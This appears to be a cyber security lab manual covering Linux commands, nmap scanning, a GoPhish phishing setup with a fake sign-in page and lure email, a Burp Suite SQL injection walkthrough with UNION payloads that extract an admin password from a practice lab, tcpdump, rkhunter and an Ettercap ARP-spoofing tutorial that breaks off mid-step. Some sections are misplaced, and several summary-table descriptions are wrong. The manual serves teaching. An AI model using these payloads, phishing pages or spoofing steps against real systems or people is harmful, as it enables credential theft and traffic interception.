Cyber Security Lab

Sl No Experiment
1 Install Kali Linux and explore basic Linux commands and tools.
2 Perform basic network scanning using the Nmap tool (Zenmap on Windows).
Identify services, open ports, active hosts, operating systems, and vulnerabilities.
3 Phishing simulations (Google, LUCY and GoPhish).
4 Packet analysis using Wireshark.
5 Ransomware tabletop exercise on insider threat.
6 Perform SQL injection using BurpSuite
7 Installation of Wire shark, tcpdump, etc and observe data transferred in client
server communication using UDP/TCP and identify the UDP/TCP datagram
8 Installation of rootkits and study about the variety of options
9 Perform an Experiment to Sniff Traffic using ARP Poisoning
10 Demonstrate intrusion detection system using snort
Experiment 1
Install Kali Linux and explore basic Linux commands and tools .

Solution:

Linux commands are a type of Unix command or shell procedure. They are the basic tools
used to interact with Linux on an individual level. Linux commands are used to perform a
variety of tasks, including displaying information about files and directories.
Linux operating system is used on servers, desktops, and maybe even your smartphone. It has
a lot of command line tools that can be used for virtually everything on the system.
All users should be familiar with most of these commands as they are required for most
operating system tasks and computer programming.
Here we have put all Basic Linux Commands that every Linux user (as a beginner) should
know. These are not all that you should know, but these are the basic and most commonly used
commands.

1. ls command in Linux
The ls command is commonly used to identify the files and directories in the working directory.
This command is one of the many often-used Linux commands that you should know.
This command can be used by itself without any arguments and it will provide us the output
with all the details about the files and the directories in the current working directory. There is
a lot of flexibility offered by this command in terms of displaying data in the output. Check the
below image for the output.

2. pwd command in Linux

The pwd command is mostly used to print the current working directory on your terminal. It
is also one of the most commonly used commands.
Now, your terminal prompt should usually include the entire directory. If it doesn’t, this is a
quick command to see which directory you’re in. Another purpose for this command is when
creating scripts because it can help us find the directory in which the script was saved. The
below pictures are the output with the command.
Command:

Output:

3. mkdir command in Linux

This mkdir command allows you to create fresh directories in the terminal itself. The default
syntax is mkdir <directory name> and the new directory will be created.
For example, if you want to create a directory as “GeeksforGeeks” then the basic syntax
would be:
mkdir GeeksforGeeks
In case you want to create another directory inside the main directory GeeksforGeeks to store
projects, you can use the following command to do so. mkdir GeeksforGeeks/projects
Command:

Output:

You can see we used ls first to see the directories present there and then mkdir to create another
directory followed by ls to view the created directories.

4. cd command in Linux
The cd command is used to navigate between directories. It requires either the full path or the
directory name, depending on your current working directory. If you run this command without
any options, it will take you to your home folder. Keep in mind that it can only be executed by
users with sudo privileges.
Command:

Output:

Here we used pwd to view the current directory for reference and then we
used cd GeeksforGeeks to switch the directory and with again pwd command we can see the
output is the switched directory, i.e – GeeksforGeeks

5. rmdir command in Linux

The rmdir command is used to delete permanently an empty directory. To perform this
command the user running this command must be having sudo privileges in the parent
directory.
Command:

Command to remove the directory

Output:
Here we used the ls command to check the directories present there and used rmdir <directory
name> to delete the directory and again the ls command to view the directories after deleting
the same.

6. cp command in Linux
The cp command of Linux is equivalent to copy-paste and cut-paste in Windows.
Command:

Output:

Here we used ls to view the files and then used cp to copy the files
of first.txt to second.txt and again used ls command to view the updated files.

7. mv command in Linux
The mv command is generally used for renaming the files in Linux.
Command:

Output:

Here we used the ls command to check the directories and then used mv <file name>
<Renamed file name> to rename the files, and then again we used the ls command to view
the renamed file as you can see in the output screenshot.

8. rm command in Linux
rm command in Linux is generally used to delete the files created in the directory.
Command:

Output:
You can see as we wrote the ls command to view the files in the terminal and then rm <file
name> to delete the files and again we had the ls command to check the update.

9. uname command in Linux

The uname command is used to check the complete OS information of the system. Check out
the command and the output below
Command:

Output:

10. locate command in Linux

The locate command is generally used to locate the files in the database. Use an asterisk (*)
to search for content that contains two or more words. As an example: locate first*file. This
command will search the database for the files that contain these two names first and file.
Command:

Output:

We first used the rm command to delete the file and then used the locate command to find the
file in the database which in return has given the output with a -e as the file was removed.

11. touch command in Linux

The touch command creates an empty file when put in the terminal in this format as
touch <file name>
Command:

Output:

We used the ls command to check the current directories in the terminal and then used
the touch command to create an empty file and then again we used ls to find out the created
file in the terminal.
12. ln command in Linux
The ln command is used to create a shortcut link to another file. This is among the most
important Linux commands to know if you want to operate as a Linux administrator.
Command:

Output:

Here we used mkdir to create two directories and then we used ln with an -s to create a soft
link in it.

13. cat command in Linux

The cat command is the simplest command to use when you want to see the contents of a
particular file. The only issue is that it simply unloads the entire file to your terminal. If you
want to navigate around a huge file, should use less command alternatively.
Command:

Output:

14. clear command in Linux

The clear command is a standard command to clear the terminal screen.
Command: *This was the terminal before the command.

Output:
15. ps command in Linux
ps command in Linux is used to check the active processes in the terminal.
Command:

Output:

16. man command in Linux

The man command displays a user manual for any commands or utilities available in the
Terminal, including their name, description, and options.
Command to view the full manual:
man <command name>
For example, suppose you want to look up the manual for the ls command: man ls
Command:

Output:

17. grep command in Linux

The grep command is used to find a specific string in a series of outputs. For example, if you
want to find a string in a file, you can use the syntax: <Any command with output> | grep
“<string to find> “
For Example:
cat Files.txt | grep “new”
Command:
Output:

In this command, we first used cat <file name> to view the content of the file, and then we
used cat <file name> | grep “string” to check the string in it.

18. echo command in Linux

echo command in Linux is specially used to print something in the terminal
Command:

Output:

19. wget command in Linux

The wget command in the Linux command line allows you to download files from the internet.
It runs in the background and does not interfere with other processes.
Here is the basic syntax: wget [option] [url]
Command:
wget http://sample.com/sample-menu.php

Output:
20. whoami command in Linux
The whoami command provides basic information that is extremely useful when working on
multiple systems. In general, if you are working with a single computer, you will not require it
as frequently as a network administrator.

Command:

Output:

21. sort command in Linux

The sort command is used generally to sort the output of the file. Let’s use the command and
see the output.
Command: (We are using the cat command to see the file content)

Output: (The content of multiple.txt file in the terminal)

Now we will sort the outcome using the sort command

Command:

Output:

Here first we checked the file content using the cat command and then we sorted it
alphabetically using the sort command.

22. cal command in Linux

The cal command is not the most famous command in the terminal but it functions to view the
calendar for a particular month in the terminal. Let’s see how this works.
Command:

Output:
23. whereis command in Linux
whereis command in Linux is generally used to see the exact location of any command typed
after this. Let’s see how this performs.
Command:

Output:

24. df command in Linux

df command in Linux gets the details of the file system.
Command:

Output:

Here we have used df -h as simply typing df will return the output in bytes which is not
readable, so we add -h to make the outputs more readable and understandable.

25. wc command in Linux

wc command in Linux indicates the number of words, characters, lines, etc using a set of
options.
wc -w shows the number of words
wc -l shows the number of lines
wc -m shows the number of characters present in a file
Let’s see one example of these options
Command:

Output:

Here we used the touch command to create a text file and then used the echo command to input
a sentence that contains six words and we used the wc -w command to calculate the number of
words in it.

Summary of Basic Linux Commands

1. ls command in Linux Displays information about files in the current directory.
2. pwd command in Linux Displays the current working directory.
3. mkdir command in
Creates a directory.
Linux
4. cd command in Linux To navigate between different folders.
5. rmdir command in
Removes empty directories from the directory lists.
Linux
6. cp command in Linux Moves files from one directory to another.
7. mv command in Linux Rename and Replace the files
8. rm command in Linux Delete files
9. uname command in
Command to get basic information about the OS
Linux
10. locate command in
Find a file in the database.
Linux
11. touch command in
Create empty files
Linux
12. ln command in Linux Create shortcuts to other files
13. cat command in Linux Display file contents on terminal
14. clear command in
Clear terminal
Linux
15. ps command in Linux Display the processes in terminal
16. man command in
Access manual for all Linux commands
Linux
17. grep command in
Search for a specific string in an output
Linux
18. echo command in
Display active processes on the terminal
Linux
19. wget command in
download files from the internet.
Linux
20. whoami command in
Create or update passwords for existing users
Linux
 21. sort command in
sort the file content
Linux
22. cal command in LinuxView Calendar in terminal
23. whereis command in View the exact location of any command typed after this
Linux command
24. df command in Linux Check the details of the file system
Check the lines, word count, and characters in a file using
25. wc command in Linux
different options

Advanced Linux Commands for Managing Users

Linux is a fantastic platform that allows multi-user access options. Different users can access
the same Linux OS for working simultaneously. A user account allows multiple people to
access directories, terminals, the Internet, etc. There are three types of user accounts:
User Account: This account is for general use with limited permissions.
System Account: This account is used for operating specific programs such as daemon,
MySQL, mail, etc.
Root Account: This account is for administrators. It has unlimited access to change the
system.

However, multiple users sharing the same passwords can be a problem for security reasons.
Therefore, managing the users becomes essential to keep the system secured. Don’t worry
because there are 7 Linux commands for managing users. So let’s discuss these commands
in brief with the relevant examples:

1. Create a User
Creating users is one of the most common tasks in Linux, and the useradd command is used
for it. For example, let’s add Eddie using the following command:
sudo useradd Eddie
useradd Command
If you want to assign a password to the user, execute the passwd command in the terminal.
sudo passwd Eddie

passwd Command

2. Delete a User
For deleting a user, run the userdel command, or add -r to delete its home directory and mail
spool. So here we are deleting Norman from the system using the following command:
sudo userdel Norman

userdel Command

3. Display Detailed Information of a User

You can use the lslogins command to check the comprehensive information of all users. This
command provides the complete overview of all users and groups, and here is the example:
$ lslogins

lslogins command

4. List the Users

You can either use compgen command or /etc/passwd to list down all system users. Output
from compgen command is simpler than compared to the /etc/passwd. These are the
commands you can execute:
$ compgen -u

compgen command
$ cat /etc/passwd

cat /etc/passwd

5. Switch User Accounts

First, let’s identify the current user with the below command:
$ whoami

whoami
As you can see in the above image, the current user is Morbius. Therefore, we will switch to
user Eddie with the su command:
$ su Eddie
su command
Type exit to stop the user and back to the current user.

6. Modify a User
With the usermod command, you can change the information of a specific user. In this
example, we add a comment “symbiote” with the user “Eddie.”
$ sudo usermod -c "symbiote" Eddie

usermod command
To verify the successful modification, we check the user account name in the /etc/passwd
file through the grep command:
$ grep 'Eddie' /etc/passwd

grep command

7. Add or Remove a User from a Group

You can add or remove users to a particular group using
the addgroup and delgroup command. In this example, we are adding Eddie to MorbiVerse
using the following command:
$ sudo addgroup Eddie MorbiVerse
To remove the user from a group, execute the below command:
$ sudo delgroup Eddie MorbiVerse
With the addgroup command, you can add different users to a group, like if five users are
working in the development department, the admin can create a group of those users.

Ref:
https://null-byte.wonderhowto.com/how-to/linux-basics/
Experiment 2
Perform basic network scanning using the Nmap tool (Zenmap on Windows). Identify
services, open ports, active hosts, operating systems, and vulnerabilities.

Solutions:
Nmap is Linux command-line tool for network exploration and security auditing. This tool is
generally used by hackers and cybersecurity enthusiasts and even by network and system
administrators. It is used for the following purposes:
 Real time information of a network
 Detailed information of all the IPs activated on your network
 Number of ports open in a network
 Provide the list of live hosts
 Port, OS and Host scanning

Installing Nmap Command

In case of Debian/Ubuntu
sudo apt-get install nmap
In case of CentOS/RedHat
yum install nmap

Working with Nmap Command

1. To scan a System with Hostname and IP address. First, Scan using Hostname
nmap www.geeksforgeeks.org

Now let’s Scan using IP Address

nmap 172.217.27.174
The nmap command allows scanning a system in various ways. In this we are performing a
scan using the hostname as “geeksforgeeks” and IP address “172.217.27.174”, to find all
open ports, services, and MAC addresses on the system.
2. To scan using “-v” option.
nmap -v www.geeksforgeeks.org

It is used to get more detailed information about the remote machines.

3. To scan multiple hosts
nmap 103.76.228.244 157.240.198.35 172.217.27.174
We can scan multiple hosts by writing IP addresses or hostnames with nmap.
4. To scan whole subnet
nmap 103.76.228.*
We can scan a whole subnet or IP range with nmap by providing “*” with it. It will scan a
whole subnet and give the information about those hosts which are Up in the Network.
5. To scan specific range of IP address
nmap 192.168.29.1-20
We can specify the range of IP addresses. This command will scan IP address 192.168.29.1
to 192.168.29.20 .
6. To scan to detect firewall settings.
sudo nmap -sA 103.76.228.244
Detecting firewall settings can be useful during penetration testing and vulnerability scans.
To detect it we use “-sA” option. This will provide you with information about firewall being
active on the host. It uses an ACK scan to receive the information.
7. To identify Hostnames
sudo nmap -sL 103.76.228.244

We use “sL” option to find hostnames for the given host by completing a DNS query for each
one. In addition to this “-n” command can be used to skip DNS resolution, while the “-R”
command can be used to always resolve DNS.
8. To scan from a file
nmap -iL input.txt

If we have a long list of addresses that we need to scan, we can directly import a file through
the command line. It will produce a scan for the given IP addresses.
9. To get some help
nmap -h

We use the “-h” option if we have any questions about nmap or any of the given commands.
It shows the help section for nmap command, including giving information regarding the
available flags.
10. Here -sS flag is used for TCP SYN Scan, Which is a stealthy and efficient method of
scanning for open ports on a target system.
nmap -sS <Domain Name>
11. Here “-oG” flag can be used to store the nmap result in to specific file.
nmap -sS <Domain Name> -oG <file-path>

12. The “-sU” flag is used with nmap to perform a UDP scan, which allows the user to
discover open UDP ports and services on a target system.
nmap -sU <Domain Name>
13. The “-sn” flag is used with nmap to perform a ping scan, which sends ICMP requests to a
target host or network to determine hosts is up or not.
nmap -sn <Domain Name>

14. The “-p” flag is used with nmap to perform scan on a specific port or range of ports. ( In
our case it will scan port 80,443 and 21 )
nmap -p 80 443 21 <Domain Name>
15. We can also specify the range of ports to scan on a network. ( In this case it will scan all
the ports in the range of 1 to 80 )
nmap -p 1-80 <Domain Name>

16. Here -A indicates aggressive, it will give us extra information, like OS detection (-O),
version detection, script scanning (-sC), and traceroute (–traceroute). It even provides a lot of
valuable information about the host.
nmap -A <Domain Name>

17. Using this command we can discover the target hosting service or identify additional
targets according to our needs for quickly tracing the path.
nmap --trace out <Domain Name>
18. Here it will display the operating system where the domain or ip address is running, but
will not display the exact operating system available on the computer. It will display only the
chance of operating system available in the computer. The command will just guess the
running operating system (OS) on the host.
nmap -O <Domain Name>
Experiment 3

Step1:Download from https://github.com/gophish/gophish/releases

Step2:From cmd prompt run gophish using gophish.exe

Step3: After running gophish, you will find uid and pwd

Step4:Reset Password
Step5:Select Sending Profile tab and fill in the details as shown below.
Step6:Select Landing Page tab and fill in the details as shown below.

<!DOCTYPE html><html lang="en"><head>

<title>Sign In</title>
</head>
<body>
<form action="" method="POST">
<h2>Sign In</h2>
<input type="text" name="username" placeholder="Email"/>
<input type="password" name="password" placeholder="Password"/>
<button type="submit">Sign In</button>
</form>

</body></html>
Step7: Select and Edit Email Template tab and fill in the details as shown below.

<!DOCTYPE html>
<html>
<head>
<h3>Bulletin Alert!!</h3>
<title><h3>Bulletin Alert!!</h3></title>
</head>
<body>
<h3>Bulletin Alert!!</h3>
<h3>Attention {{.FirstName}} {{.LastName}}:</h3>
<p>Bulletin Headline: Change Password</p>
<p>Sending Agency: Office Admin</p>
<p><a href="{{.URL}}">To view the full bulletin alert click here</a></p>
<br>
<p>To unsubscribe from these emails click <a href="{{.URL}}">here</a></p>
{{.Tracker}}
</body>
</html>

Step7: Select & Edit User & Groups tab and fill in the details as shown below.
Step8: Select & Edit Campaign tab and fill in the details as shown
below. Click launch campaign

Output: Below are the expected output.

Experiment 4
Packet analysis using Wireshark.

Solution:
Analyzing Data Packets in Wireshark
After packet capture is complete, users can also perform network packet analysis with
Wireshark. First, users should be aware of the various filters and options available in
Wireshark. For example, the Wireshark tool can automatically label different types of traffic
with different colors (e.g., packets using TCP/IP with one color or packets containing errors
with another).
To analyze data packets in Wireshark, first, open the corresponding file that has been saved
after the packet capturing process. Next, users can narrow their search by using Wireshark’s
filter options. Below are just a few possibilities for using Wireshark filters:
 Showing only traffic from a particular port.
 Showing only packets that contain a particular byte sequence.
 Showing only traffic to a particular source or from a particular destination.
Users can select a given packet in the Wireshark interface to display more details about that
packet. Wireshark’s Packet Details pane contains additional information about the packet’s IP
address, header, payload data, and more (Wireshark).
The TCP and UDP filters are used for the analysis

TCP
tcp.ack tcp.reassembled_in
tcp.options.qs tcp.flags.syn
tcp.checksum tcp.segment
tcp.options.sack tcp.flags.urg
tcp.checksum_bad tcp.segment.error
tcp.options.sack_le tcp.hdr_len
tcp.checksum_good tcp.segment.multipletails
tcp.options.sack_perm tcp.len
tcp.continuation_to tcp.segment.overlap
tcp.options.sack_re tcp.nxtseq
tcp.dstport tcp.segment.overlap.conflict
tcp.options.time_stamp tcp.options
tcp.flags tcp.segment.toolongfragment
tcp.options.wscale tcp.options.cc
tcp.flags.ack tcp.segments
tcp.options.wscale_val tcp.options.ccecho
tcp.flags.cwr tcp.seq
tcp.pdu.last_frame tcp.options.ccnew
tcp.flags.ecn tcp.srcport
tcp.pdu.size tcp.options.echo
 tcp.flags.fin tcp.time_delta
tcp.pdu.time tcp.options.echo_reply
tcp.flags.push tcp.time_relative
tcp.port tcp.options.md5
tcp.flags.reset tcp.urgent_pointer
tcp.options.mss_val tcp.options.mss
tcp.window_size

UDP
udp.checksum
udp.dstport
udp.srcport
udp.checksum_bad
udp.length
udp.checksum_good
udp.port

Step 1: Open terminal to update and install

 Start Capture:

 Once you select the interface, Wireshark will start capturing packets in real-time. You will see a
scrolling list of packets with details like source/destination addresses, protocols, etc.

 Stop Capture:

 To stop capturing packets, you can click on the red square "Stop" button in Wireshark's toolbar.
 Filtering Packets (Optional):

 Wireshark allows you to apply filters to focus on specific types of packets (e.g., HTTP, TCP,
UDP). You can enter filter expressions in the display filter toolbar (just below the toolbar) to
narrow down the displayed packets.

 Analyzing Packets:

 Click on any packet in the list to see detailed information in the lower panels of Wireshark. This
includes protocol information, packet contents in different formats (hex, ASCII, etc.), and even
decoded application layer data (e.g., HTTP headers).

 IP Address: To filter packets based on a specific IP address (e.g., 192.168.1.100), enter ip.addr
== 192.168.1.100.
 Protocol: To filter packets of a specific protocol (e.g., TCP), enter tcp.

 Port: To filter packets on a specific port (e.g., port 80 for HTTP), enter tcp.port == 80.
 Source or Destination IP: To filter packets where a specific IP is the source or destination, use
ip.src == 192.168.1.100 or ip.dst == 192.168.1.100.

 Combining Filters: You can combine filters using logical operators such as and, or, and not. For
example, ip.addr == 192.168.1.100 and tcp.port == 80 filters packets where the IP address
is 192.168.1.100 and the protocol is TCP on port 80.
 Save Captured Data (Optional):

 If you want to save the captured packets for later analysis, you can go to File > Save As and
choose a file format (e.g., pcap). This file can be reopened in Wireshark for further analysis.
Experiment 5

Tabletop Ransomware incident response

Section Title Description Completed
1 Introduction, policy  Specify the purpose, scope, goals and objectives of ☐
and organization the ransomware incident response plan.
 Identify any regulations or statutes that govern the
plan (e.g., FEMA, OSHA, local code).
 List who will have hard copies of the plan and who
will have access to the plan electronically.
 Include a schedule of plan revisions.
 Include management approvals and authorizations.
2 Incident management  Define the approach to managing a ransomware ☐
strategy attack, for example, isolate the malware, remain at
office, work remotely.
 Identify alternate resources and supply sources.
 Identify resources to back up systems, data,
databases and other critical information assets.
 Define incident response team roles and
responsibilities during and after an event.
 Establish lines of authority in a ransomware attack.
 List people who can back up primary team members
if they are unavailable.
 Document actions to take when responding to
ransomware activities.
3 Incident response  Define who is to be contacted during the incident. ☐
communications  Determine the sequence and frequency of messages
to management, employees and others.
 Prepare a detailed contact list with all methods of
reaching team members, key vendors, law
enforcement, first responders and other government
agencies.
 Include roles and responsibilities in contact lists.
 Deploy conference technologies to ensure
employees can keep in touch with managers and
team members.
5 Incident response  Examine attack data from firewalls, intrusion ☐
procedures detection equipment and antimalware software.
 If the incident assessment indicates a ransomware
attack, convene the incident response team.
 Isolate the malware for further analysis.
 Examine communications from the attack
perpetrators to see what they want.
 Determine initial steps to mitigate the severity of the
attack, e.g., use software to examine the malware
attack signature and identify possible remedies.
 Proceed with steps to identify what has been
compromised and to regain access.
 Determine initial steps for managing how the
company operates during the incident.
 Schedule regular team meetings to assess progress.
 Communicate status regularly to employees,
management, stakeholders and the media.
Section Title Description Completed
 Continue with steps to isolate and mitigate/eliminate
the malware.
 If response actions are unsuccessful, discuss options
with incident response team and senior
management.
 Once the situation has been remedied, compile notes
on attack activity in preparation for a post-event
review and after-action report.
6 Conduct a post-event  Gather output data from firewalls, intrusion detection ☐
review and prepare a equipment and antimalware software for further
report analysis.
 Examine reporting from systems dealing with the
ransomware attack; identify what worked and what
did not work.
 Discuss next steps, including updating cybersecurity
plans and ransomware incident response plans,
updating cybersecurity prevention tools, etc.
 Perform follow-up tests of antimalware prevention
software and test updated ransomware plans.
 Initiate a plan to complete remediation steps
identified and perform tests to validate corrections
are appropriate.
 Prepare an after-action report for presentation to
senior management on the incident.
 Monitor all possible malware entry points and monitor
systems and data that could be affected in the future.
7 Link with other  Determine if activation of other plans, such as ☐
emergency plans business continuity plans, is needed.
 If this is the case, determine when one plan ends and
another is activated.
8 Awareness and  Develop and conduct training programs for incident ☐
training response team members.
 Develop and conduct training programs for senior
management and all employees.
 Create an awareness program to keep employees,
management and stakeholders aware of the
ransomware incident response plan.
9 Plan exercising  Schedule and conduct periodic exercises of the ☐
ransomware incident response plan, including
tabletop walkthroughs and full active simulations
involving activation of the incident response team
and other third-party organizations.
 Update the incident response based on exercise
results.
12 Plan review, audit and  Establish a ransomware response plan as part of ☐
maintenance overall cybersecurity program activities.
 Schedule plan reviews and updates at least annually.
 Create a schedule of ransomware incident response
activities during a calendar year, e.g., plan exercises,
plan reviews, and training and awareness.
Section Title Description Completed
12 Appendixes Prepare and include relevant appendixes that support the ☐
incident response plan, such as forms, checklists and
contact lists.
 Experiment 6
Perform SQL injection using BurpSuite
Solution
Web applications are becoming more and more popular, replacing traditional desktop
programs at an accelerated rate. With all these new apps out on the web comes various
security implications associated with being connected to the internet where anyone can poke
and prod at them. One of the simplest, yet the most prevalent types of security flaws found
in modern web apps are SQL injections.
A typical web app doesn't actually store any information in the app itself, but rather it
communicates with a backend database where data is stored. These requests are handled by
SQL queries in which the application passes a statement to the database, thus returning the
requested data to the application.

What Is SQL Injection?

SQL injection is a technique used to attack applications utilizing a database by sending

malicious code with the intention of accessing or modifying restricted information in the
database. There are many reasons why this vulnerability exists, including improper input
filtering and sanitation.

This type of attack allows one to retrieve sensitive information, modify existing data, or
even destroy entire databases. The most common attack vector for SQL injection is through
input fields — login forms, search forms, text boxes, and file upload functions are all
excellent candidates for exploitation.
n this guide, our target will be Mutillidae, an intentionally vulnerable web app included as
part of Metasploitable 2, an intentionally vulnerable Linux virtual machine (VM) designed
for testing and practicing purposes. We will be connected to Metasploitable 2 on an isolated
network with Kali as the attacking machine.

Step 1 : Download BurpSuit from https://portswigger.net/burp/communitydownload for Windows.

Step 2: Run the downloaded file “burpsuite_community_windows-x64_v2024_5_5.exe”

Step 2: Run the Burp Suit Community Edition application.

Step 3:
 Select “Temporary project in memory” and click “next”.
 Select “Use Burp defaults” and click “Start Burp”
Step 3.1: Select “Proxy” tab to open browser
Step 4: To Open vulnerable Web Application visit https://portswigger.net/web-security/all-labs and click on
the below tab
Step 5: right click on Access the lab button and copy the link.

Step 6: Copy the URL from the browser to first register and later open the application by loggin in with the
same credentials.

Step 7: After logging in you should be able to view this application inside the builtin browser, Navigate to ALL
tab and Lifestyle tab.
Step 8: Open the packet containing Lifestyle as category.

Step 9: Click on send to repeater.

Step 10: Under Repeater Tab use this space to inject sql query

Run the below query as shown below.

GET /filter?category='+union+select+table_name,NULL+from+information_schema.tables----
HTTP/2

NULL helps ensure that the structure of the UNION query aligns with the structure
of the original query's result set, making the injection more likely to work
correctly.

Search for the below keyword from the response.

administrable_role_authorizations

Once you get “'administrable_role_authorizations” run using this keyword in the below SQL.

GET
/filter?category='+union+select+column_name,NULL+from+information_schema.columns+WHERE+tabl
e_name+=+'administrable_role_authorizations'-- HTTP/2

Output of the above query will give you the user having admin previleges. Pick up the user
having the format “users_” and then use the below query to confirm if it is a admin.
Will try

'+union+select+table_name,NULL+from+information_schema.tables--
GET /filter?category='+union+select+username_wcmhtk,password_vgokme+from+users_paomhr--
HTTP/2

You will get uid and password in response:

Uid - administrator
Pwd-95z5iu6jsemuymg2fk4l

Use it to to login: After Logging using the credentials you will be greeted with congratulations, you solved the
lab! Message
'+union+select+table_name,NULL+from+information_schema.tables--

users_paomhr

GET
/filter?category='+union+select+column_name,NULL+from+information_schema.columns+WHERE+tabl
e_name+=+'users_paomhr'-- HTTP/2

'+union+select+username_wcmhtk,password_vgokme+from+users_paomhr--

username_wcmhtk
password_vgokme
Experiment 7
Part1: Installation of Wire shark, tcpdump, etc
Solution:

Installation of Wire shark

1. Add the stable official PPA. To do this, go to terminal by pressing Ctrl+Alt+T and
run:

sudo add-apt-repository ppa:wireshark-dev/stable

2. Update the repository:

sudo apt-get update

3. Install wireshark 2.0:

sudo apt-get install wireshark

4. Run wireshark:

sudo wireshark

If you get an error couldn't run /usr/bin/dumpcap in child process: Permission Denied,
go to the terminal again and run:

sudo dpkg-reconfigure wireshark-common

Say YES to the message box. This adds a wireshark group. Then add user to the
group by typing

sudo adduser $USER wireshark

sudo chmod +x /usr/bin/dumpcap

Installation of tcpdump
1. tcpdump is builtin no need to install

Part 2: observe data transferred in client server communication using UDP/TCP and identify
the UDP/TCP datagram
Tcpdump data capturing

Breaking down the Tcpdump Command Line

The following command uses common parameters often seen when wielding
the tcpdump scalpel.

:~$ sudo tcpdump -i eth0 -nn -s0 -v port 80

-i : Select interface that the capture is to take place on, this will often be an ethernet card or
wireless adapter but could also be a vlan or something more unusual. Not always required if
there is only one network adapter.

-nn : A single (n) will not resolve hostnames. A double (nn) will not resolve hostnames or ports.
This is handy for not only viewing the IP / port numbers but also when capturing a large amount
of data, as the name resolution will slow down the capture.

-s0 : Snap length, is the size of the packet to capture. -s0 will set the size to unlimited - use this
if you want to capture all the traffic. Needed if you want to pull binaries / files from network
traffic.

-v : Verbose, using (-v) or (-vv) increases the amount of detail shown in the output, often
showing more protocol specific information.

port 80 : this is a common port filter to capture only traffic on port 80, that is of course usually
HTTP.

Display ASCII text

Adding -A to the command line will have the output include the ascii strings from the capture.
This allows easy reading and the ability to parse the output using grep or other commands.
Another option that shows both hexadecimal output and ASCII is the -X option.

$ sudo tcpdump -A -s0 port 80

Capture on Protocol

Filter on UDP traffic. Another way to specify this is to use protocol 17 that is udp. These two
commands will produce the same result. The equivalent of the tcp filter is protocol 6.

$ sudo tcpdump -i eth0 udp

Capture Hosts based on IP address

Using the host filter will capture traffic going to (destination) and from (source) the IP address.

$ sudo tcpdump -i eth0 host 10.10.1.1

Alternatively capture only packets going one way using src or dst.
$ sudo tcpdump -i eth0 dst 10.10.1.20

Write a capture file

Writing a standard pcap file is a common command option. Writing a capture file to disk allows
the file to be opened in Wireshark or other packet analysis tools.

$ sudo tcpdump -i eth0 -s0 -w test.pcap

Working with Wireshark

 Experiment 08:

install rootkits and study variety of options.

A rootkit is a stealthy type of malicious software (malware) designed to hide the existence of
certain processes or programs from normal methods of detection and enables continued
privileged access to a computer.[1] The term rootkit is a concatenation of "root" (the traditional
name of the privileged account on Unix operating systems) and the word "kit" (which refers to
the software components that implement the tool). The term "rootkit" has negative connotations
through its association with malware.[1]

A rootkit is a collection of tools (programs) that enable administrator-level access to a computer

or computer network. Typically, a cracker installs a rootkit on a computer after first obtaining
user-level access, either by exploiting a known vulnerability or cracking a password. Once the
rootkit is installed, it allows the attacker to mask intrusion and gain root or privileged access to
the computer and, possibly, other machines on the network.

A rootkit may consist of spyware and other programs that: monitor traffic and keystrokes; create
a "backdoor" into the system for the hacker's use; alter log files; attack other machines on the
network; and alter existing system tools to escape detection.

How to Use rkhunter:

Installation: rkhunter is typically installed on Linux systems using package management tools
like apt (for Debian-based systems) or yum (for Red Hat-based systems). For example:

sudo apt update

sudo apt install rkhunter

Running a Scan: After installation, you can run a scan using the following command:
sudo rkhunter --check

 Use sudo to run the command with elevated privileges, as rkhunter needs root permissions to access
critical system files and directories.

Tips for Beginners:

 Regular Scans: Perform regular scans with rkhunter to proactively monitor the security of your
system.
 Understanding False Positives: Be aware that rkhunter may sometimes flag legitimate system
changes or configurations as potential threats (false positives). Investigate any alerts thoroughly
before taking action.
 Updating Definitions: Keep rkhunter and its signature database up to date to ensure it can detect
the latest threats effectively.

By using tools like rkhunter, beginners can gain valuable insights into the importance of system
integrity and security monitoring in Linux environments. It helps build awareness of common
security threats and prepares them for implementing effective cybersecurity measures.

Interpreting Results: Once the scan completes, review the output generated by rkhunter. Pay
attention to any warnings or alerts indicating suspicious files, modified binaries, or other potential
security issues.

sudo rkhunter --check

From root terminal:
Ettercap’s developers have released an updated version (0.8.3) that fixes prior bugs and gives the
user a redesigned GUI. In my prior tutorial, I went over how to perform ARP cache poisoning
(aka spoofing — we will use the terms interchangeably) against Windows 7 utilizing Ettercap. In
this tutorial, we will perform ARP spoofing with Ettercap and Wireshark in Kali against a
Windows 10 machine.

This type of attack is known as a man in the middle attack or MitM. There are several types of
these attacks which Ettercap can perform. For a detailed explanation of the different functions
that Ettercap performs please see their GitHub page.

Note: if you are curious to know what the differences between the older and newer versions of
Ettercap are, watch this video by the developers.

Configuring our Virtual Machines (VMs) for

ARP Spoofing
In this updated tutorial we will be using Kali Linux 2020. You could also create a GPO which
allows the ICMP protocol and other functions. Forsimplicity’s sake, I recommend that you
simply turn off Windows firewall.

Before starting you need to be familiar with the various options for virtualization. I am using
VMware workstation in this lab. A free option is Oracle Virtualbox.

In using VMs you ensure that you’re conducting this attack safely.

Step #1 – Networking information

Start kali linux on virtual machine.

Choose the Bridge network from the settings of VM

Settings > Network > Bridge Adapter(Attached to)

 Network

For Kali, open the terminal and type:

sudo ifconfig
or:

ip a

Without the sudo command.

On the Windows 10 machine type CMD after clicking on the Windows icon bottom left of your
screen. Then, enter this command:

ipconfig

You will need to copy the IPv4 addresses which will be in a 4 dotted decimal format: e.g.
192.168.0.0

Take note of the default gateway address as well which will be easiest to view on the Windows
machine. (See screenshot below)

* I included the subnet mask as you need to make sure that both IPs are in the same subnet.
Step #2 – Launching Ettercap
In the Kali VM, pull up the terminal and type:

sudo ettercap -G

This starts the GUI and you can view the newly designed interface below:

As you can see above the design is completely different with the main difference being the menu
options. Those options are now integrated within the application window.

Unified sniffing is selected as the default, so at this point simply ensure that the correct interface
you want to begin sniffing on is selected. Most of the time this will be eth0.

Next, click on the check mark to the right top of the Ettercap application window. This starts
unified sniffing on your network interface.
Step #3 – Adding Hosts to Ettercap
Begin by looking at the top left of the application window and click on the magnifying glass icon.

This will scan for hosts within your network. In our case, we are looking for the IP you copied
from Step 1, which will be our Windows 10 machine.

You also need to look for the default gateway address in the host list as well.

Below you will find 3 screenshots that show each step with the last enabling you to view the
current host list:
Note: Select the three vertical dots on the right of the application window to pull down the
options you see, and select Hosts.
Note: After selecting Hosts, select view Hosts list and this will enable you to see the current
listing of Hosts on your network.

Step #4 – Adding Targets

Looking at your current Hosts list, select the default gateway address which in this case is
